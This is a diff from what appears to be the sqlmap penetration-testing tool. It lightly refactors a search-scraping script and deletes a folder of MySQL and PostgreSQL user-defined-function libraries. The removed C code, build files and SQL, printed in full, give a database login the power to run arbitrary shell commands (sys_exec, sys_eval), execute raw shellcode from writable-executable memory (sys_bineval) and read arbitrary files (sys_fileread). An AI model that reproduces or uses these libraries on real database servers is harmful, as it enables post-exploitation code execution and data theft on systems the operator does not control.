+            for line in f.xreadlines():
+                if len(line) > 0 and ',' in line:
+                    temp = line.split(',')
+                    tables[temp[0]] = int(temp[1])
     except:
         pass
 
     socket.setdefaulttimeout(TIMEOUT)
 
-    files, oldFiles = None, None
+    files, old_files = None, None
     try:
         while True:
             abort = False
-            oldFiles = files
+            old_files = files
             files = []
 
             try:
-                conn = opener.open('%s&q=%s&start=%d&sa=N' % (SEARCH_URL, QUERY.replace(' ', '+'), i*10))
+                conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10))
                 page = conn.read()
-                for match in refiles.finditer(page):
+                for match in re.finditer(REGEX_URLS, page):
                     files.append(urllib.unquote(match.group(1)))
-                    if len(files) >= 10: break
-                abort = (files == oldFiles)
+                    if len(files) >= 10:
+                        break
+                abort = (files == old_files)
 
             except KeyboardInterrupt:
                 raise
@@ -88,28 +82,29 @@ def main():
                 break
 
             sys.stdout.write("\n---------------\n")
-            sys.stdout.write("Result page #%d\n" % (i+1))
+            sys.stdout.write("Result page #%d\n" % (i + 1))
             sys.stdout.write("---------------\n")
 
             for sqlfile in files:
                 print sqlfile
+
                 try:
                     req = urllib2.Request(sqlfile)
                     response = urllib2.urlopen(req)
 
-                    if response.headers.has_key('Content-Length'):
-                        if int(response.headers.get('Content-Length')) > MAX_FILE_SIZE:
+                    if "Content-Length" in response.headers:
+                        if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE:
                             continue
 
                     page = response.read()
                     found = False
                     counter = 0
 
-                    for match in retables.finditer(page):
+                    for match in re.finditer(REGEX_RESULT, page):
                         counter += 1
-                        table = match.group("result").strip().strip("`").strip("\"").strip("'").replace('"."', ".").replace("].[", ".").strip('[').strip(']')
+                        table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]')
 
-                        if table and '>' not in table and '<' not in table and '--' not in table and ' ' not in table:
+                        if table and not any(_ in table for _ in ('>', '<', '--', ' ')):
                             found = True
                             sys.stdout.write('*')
 
@@ -133,19 +128,14 @@ def main():
         pass
 
     finally:
-        f = open(TABLES_FILE, 'w+')
+        with open(TABLES_FILE, 'w+') as f:
+            tables = sorted(tables.items(), key=itemgetter(1), reverse=True)
+            for table, count in tables:
+                f.write("%s,%d\n" % (table, count))
 
-        tables = sorted(tables.items(), key=itemgetter(1), reverse=True)
-
-        for table, count in tables:
-            f.write("%s,%d\n" % (table, count))
-
-        f.close()
-        config.set('options',  'index', str(i+1))
-
-        f = open(CONFIG_FILE, 'w+')
-        config.write(f)
-        f.close()
+        config.set("options", "index", str(i + 1))
+        with open(CONFIG_FILE, 'w+') as f:
+            config.write(f)
 
 if __name__ == "__main__":
     main()

extra/udfhack/README.txt

@@ -1,7 +0,0 @@
-Files in this folder can be used to compile shared objects that define
-some user-defined functions for MySQL and PostgreSQL. They are licensed
-under the terms of the GNU Lesser General Public License and their
-compiled versions are available on the official sqlmap subversion
-repository[1].
-
-[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/udf/

extra/udfhack/linux/32/lib_mysqludf_sys/Makefile

@@ -1,9 +0,0 @@
-# For MySQL < 5.1
-LIBDIR=/usr/lib
-# For MySQL >= 5.1
-#LIBDIR=/usr/lib/mysql/plugin
-
-install:
-	gcc-4.3 -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
-	strip -sx lib_mysqludf_sys.so
-	cp -f lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so

extra/udfhack/linux/32/lib_mysqludf_sys/install.sh

@@ -1,47 +0,0 @@
-#!/bin/bash
-# lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2007  Roland Bouman 
-# Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-# web: http://www.mysqludf.org/
-# email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-# 
-# This library is free software; you can redistribute it and/or
-# modify it under the terms of the GNU Lesser General Public
-# License as published by the Free Software Foundation; either
-# version 2.1 of the License, or (at your option) any later version.
-# 
-# This library is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# Lesser General Public License for more details.
-# 
-# You should have received a copy of the GNU Lesser General Public
-# License along with this library; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-
-# Adapt the following settings to your environment
-USER="root"
-PORT="3306"
-
-echo "Compiling the MySQL UDF"
-make
-
-if test $? -ne 0; then
-	echo "ERROR: You need libmysqlclient development software installed"
-	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-	echo "apt-get install libmysqlclient-dev"
-	exit 1
-else
-	echo "MySQL UDF compiled successfully"
-fi
-
-echo -e "\nPlease provide your MySQL root password"
-
-mysql -h 127.0.0.1 -P ${PORT} -u ${USER} -p mysql < lib_mysqludf_sys.sql
-
-if test $? -ne 0; then
-	echo "ERROR: unable to install the UDF"
-	exit 1
-else
-	echo "MySQL UDF installed successfully"
-fi

extra/udfhack/linux/32/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,567 +0,0 @@
-/* 
-	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-	web: http://www.mysqludf.org/
-	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define DLLEXP __declspec(dllexport) 
-#else
-#define DLLEXP
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#ifdef STANDARD
-#include <string.h>
-#include <stdlib.h>
-#include <time.h>
-#ifdef __WIN__
-typedef unsigned __int64 ulonglong;
-typedef __int64 longlong;
-#else
-typedef unsigned long long ulonglong;
-typedef long long longlong;
-#endif /*__WIN__*/
-#else
-#include <my_global.h>
-#include <my_sys.h>
-#endif
-#include <mysql.h>
-#include <m_ctype.h>
-#include <m_string.h>
-#include <stdlib.h>
-
-#include <ctype.h>
-
-#ifdef HAVE_DLOPEN
-#ifdef	__cplusplus
-extern "C" {
-#endif
-
-#define LIBVERSION "lib_mysqludf_sys version 0.0.4"
-
-#ifdef __WIN__
-#define SETENV(name,value)		SetEnvironmentVariable(name,value);
-#else
-#define SETENV(name,value)		setenv(name,value,1);		
-#endif
-
-DLLEXP 
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_get
- * 
- * Gets the value of the specified environment variable.
- */
-DLLEXP 
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_get_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_set
- * 
- * Sets the value of the environment variables.
- * This function accepts a set of name/value pairs
- * which are then set as environment variables.
- * Use sys_get to retrieve the value of such a variable 
- */
-DLLEXP 
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_set_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_exec
- * 
- * executes the argument commandstring and returns its exit status.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_exec_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_eval
- * 
- * executes the argument commandstring and returns its standard output.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_eval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_bineval
- * 
- * executes bynary opcodes.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-DLLEXP 
-void sys_bineval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-
-#ifdef	__cplusplus
-}
-#endif
-
-/**
- * lib_mysqludf_sys_info
- */
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	my_bool status;
-	if(args->arg_count!=0){
-		strcpy(
-			message
-		,	"No arguments allowed (udf: lib_mysqludf_sys_info)"
-		);
-		status = 1;
-	} else {
-		status = 0;
-	}
-	return status;
-}
-
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	strcpy(result,LIBVERSION);
-	*length = strlen(LIBVERSION);
-	return result;
-}
-
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count==1
-	&&	args->arg_type[0]==STRING_RESULT){
-		initid->maybe_null = 1;
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_get_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	char* value = getenv(args->args[0]);
-	if(value == NULL){
-		*is_null = 1;
-	} else {
-		*length = strlen(value);
-	} 
-	return value;
-}
-
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count!=2){
-		strcpy(
-			message
-		,	"Expected exactly two arguments"
-		);		
-		return 1;
-	}
-	if(args->arg_type[0]!=STRING_RESULT){
-		strcpy(
-			message
-		,	"Expected string type for name parameter"
-		);		
-		return 1;
-	}
-	args->arg_type[1]=STRING_RESULT;
-	if((initid->ptr=malloc(
-		args->lengths[0]
-	+	1
-	+	args->lengths[1]
-	+	1
-	))==NULL){
-		strcpy(
-			message
-		,	"Could not allocate memory"
-		);		
-		return 1;
-	}	
-	return 0;
-}
-
-void sys_set_deinit(
-	UDF_INIT *initid
-){
-	if (initid->ptr!=NULL){
-		free(initid->ptr);
-	}
-}
-
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){	
-	char *name = initid->ptr;
-	char *value = name + args->lengths[0] + 1; 
-	memcpy(
-		name
-	,	args->args[0]
-	,	args->lengths[0]
-	);
-	*(name + args->lengths[0]) = '\0';
-	memcpy(
-		value
-	,	args->args[1]
-	,	args->lengths[1]
-	);
-	*(value + args->lengths[1]) = '\0';
-	return SETENV(name,value);		
-}
-
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_exec_deinit(
-	UDF_INIT *initid
-){
-}
-
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){
-	return system(args->args[0]);
-}
-
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_eval_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	FILE *pipe;
-	char *line;
-	unsigned long outlen, linelen;
-
-	line = (char *)malloc(1024);
-	result = (char *)malloc(1);
-	outlen = 0;
-
-    result[0] = (char)0;
-
-	pipe = popen(args->args[0], "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (!(*result) || result == NULL) {
-		*is_null = 1;
-	} else {
-		result[outlen-1] = 0x00;
-		*length = strlen(result);
-	}
-
-	return result;
-}
-
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	return 0;
-}
-
-void sys_bineval_deinit(
-	UDF_INIT *initid
-){
-	
-}
-
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	len = (size_t)strlen(args->args[0]);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, args->args[0], len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		return 1;
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			return 1;
-
-		strncpy((char *)addr, args->args[0], len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	return 0;
-}
-
-#if defined(_WIN64)
-void __exec_payload(LPVOID);
-
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__exec_payload(lpParameter);
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-	}
-
-	return 0;
-}
-#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-	}
-
-	return 0;
-}
-#endif
-
-#endif /* HAVE_DLOPEN */

extra/udfhack/linux/32/lib_mysqludf_sys/lib_mysqludf_sys.sql

@@ -1,35 +0,0 @@
-/*
-        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-        Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-        web: http://www.mysqludf.org/
-        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-
-        This library is free software; you can redistribute it and/or
-        modify it under the terms of the GNU Lesser General Public
-        License as published by the Free Software Foundation; either
-        version 2.1 of the License, or (at your option) any later version.
-
-        This library is distributed in the hope that it will be useful,
-        but WITHOUT ANY WARRANTY; without even the implied warranty of
-        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-        Lesser General Public License for more details.
-
-        You should have received a copy of the GNU Lesser General Public
-        License along with this library; if not, write to the Free Software
-        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-DROP FUNCTION IF EXISTS sys_get;
-DROP FUNCTION IF EXISTS sys_set;
-DROP FUNCTION IF EXISTS sys_exec;
-DROP FUNCTION IF EXISTS sys_eval;
-DROP FUNCTION IF EXISTS sys_bineval;
-
-CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';

extra/udfhack/linux/32/lib_postgresqludf_sys/Makefile

@@ -1,16 +0,0 @@
-LIBDIR=/tmp
-
-8.4:
-	gcc-4.3 -Wall -I/usr/include/postgresql/8.4/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
-	strip -sx lib_postgresqludf_sys.so
-	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.3:
-	gcc-4.3 -Wall -I/usr/include/postgresql/8.3/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
-	strip -sx lib_postgresqludf_sys.so
-	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.2:
-	gcc-4.3 -Wall -I/usr/include/postgresql/8.2/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
-	strip -sx lib_postgresqludf_sys.so
-	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so

extra/udfhack/linux/32/lib_postgresqludf_sys/install.sh

@@ -1,59 +0,0 @@
-#!/bin/bash
-# lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2009-2010  Bernardo Damele A. G.
-# web: http://bernardodamele.blogspot.com/
-# email: bernardo.damele@gmail.com
-# 
-# This library is free software; you can redistribute it and/or
-# modify it under the terms of the GNU Lesser General Public
-# License as published by the Free Software Foundation; either
-# version 2.1 of the License, or (at your option) any later version.
-# 
-# This library is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# Lesser General Public License for more details.
-# 
-# You should have received a copy of the GNU Lesser General Public
-# License along with this library; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-
-# Adapt the following settings to your environment
-USER="postgres"
-PORT="5434"
-VERSION="8.4"
-#PORT="5433"
-#VERSION="8.3"
-#PORT="5432"
-#VERSION="8.2"
-
-echo "Compiling the PostgreSQL UDF"
-make ${VERSION}
-
-if test $? -ne 0; then
-	echo "ERROR: You need postgresql-server development software installed"
-	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-
-	if test "${VERSION}" == "8.2"; then
-		echo "apt-get install postgresql-server-dev-8.2"
-	elif test "${VERSION}" == "8.3"; then
-		echo "apt-get install postgresql-server-dev-8.3"
-	elif test "${VERSION}" == "8.4"; then
-		echo "apt-get install postgresql-server-dev-8.4"
-	fi
-
-	exit 1
-else
-	echo "PostgreSQL UDF compiled successfully"
-fi
-
-echo -e "\nPlease provide your PostgreSQL 'postgres' user's password"
-
-psql -h 127.0.0.1 -p ${PORT} -U ${USER} -q template1 < lib_postgresqludf_sys.sql
-
-if test $? -ne 0; then
-	echo "ERROR: unable to install the UDF"
-	exit 1
-else
-	echo "PostgreSQL UDF installed successfully"
-fi

extra/udfhack/linux/32/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -1,277 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009-2010  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-char *text_ptr_to_char_ptr(text *arg)
-{
-	char *retVal;
-	int arg_size = VARSIZE(arg) - VARHDRSZ;
-	retVal = (char *)malloc(arg_size + 1);
-
-	memcpy(retVal, VARDATA(arg), arg_size);
-	retVal[arg_size] = '\0';
-	
-	return retVal;
-}
-
-text *chr_ptr_to_text_ptr(char *arg)
-{
-	text *retVal;
-	
-	retVal = (text *)malloc(VARHDRSZ + strlen(arg));
-#ifdef SET_VARSIZE
-	SET_VARSIZE(retVal, VARHDRSZ + strlen(arg));
-#else
-	VARATT_SIZEP(retVal) = strlen(arg) + VARHDRSZ;
-#endif
-	memcpy(VARDATA(retVal), arg, strlen(arg));
-	
-	return retVal;
-}
-
-PG_FUNCTION_INFO_V1(sys_exec);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 result = 0;
-	char *command;
-
-	command = text_ptr_to_char_ptr(argv0);
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char *line;
-	int32 outlen, linelen;
-
-	command = text_ptr_to_char_ptr(argv0);
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	line = (char *)malloc(1024);
-	result = (char *)malloc(1);
-	outlen = 0;
-
-    result[0] = (char)0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = chr_ptr_to_text_ptr(result);
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif
-
-#undef fopen
-
-PG_FUNCTION_INFO_V1(sys_fileread);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 len;
-	int32 i, j;
-	char *filename;
-	char *result;
-	char *buffer;
-	char table[] = "0123456789ABCDEF";
-	FILE *file;
-
-	filename = text_ptr_to_char_ptr(argv0);
-	
-	file = fopen(filename, "rb");
-	if (!file)
-	{
-		PG_RETURN_NULL();
-	}
-	fseek(file, 0, SEEK_END);
-	len = ftell(file);
-	fseek(file, 0, SEEK_SET);
-
-	buffer=(char *)malloc(len + 1);
-	if (!buffer)
-	{
-		fclose(file);
-		PG_RETURN_NULL();
-	}
-
-	fread(buffer, len, 1, file);
-	fclose(file);
-
-	result = (char *)malloc(2*len + 1);
-	for (i=0, j=0; i<len; i++)
-	{
-		result[j++] = table[(buffer[i] >> 4) & 0x0f];
-		result[j++] = table[ buffer[i]	   & 0x0f];
-	}
-	result[j] = '\0';
-	
-	result_text = chr_ptr_to_text_ptr(result);
-	
-	free(result);
-	free(buffer);
-	free(filename);
-
-	PG_RETURN_POINTER(result_text);
-}

extra/udfhack/linux/32/lib_postgresqludf_sys/lib_postgresqludf_sys.sql

@@ -1,25 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009-2010  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
